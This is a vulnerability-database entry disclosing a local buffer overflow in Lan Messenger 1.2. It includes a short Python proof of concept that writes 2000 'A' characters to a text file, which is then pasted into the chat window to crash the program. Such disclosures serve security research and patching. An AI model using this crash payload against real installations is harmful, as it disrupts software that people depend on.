Lan Messenger Version 1.2 Buffer Overflow vulnerability

2013-05-11 / 2013-05-12
Credit: ariarat
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Lan Messenger Version 1.2 Buffer Overflow vulnerability - UNICODE(POC) # Date: 09-05-2013 # Exploit Author: ariarat # Vendor Homepage: http://lmadhavan.com # Software Link: http://lmadhavan.com/software/archive/lanmsg12.zip # Version: 1.2 & may be old versions! # Tested on: [ Windows 7 & windows XP sp2,sp3] #============================================================================================ # After creating txt file,open created file and copy the AAA... string to clipboard and # then paste in Public Chat's send PM section or in any window for sending PM to others. # #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python filename="string.txt" buffer = "\x41" * 2000 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

References:

http://lmadhavan.com
http://lmadhavan.com/software/archive/lanmsg12.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top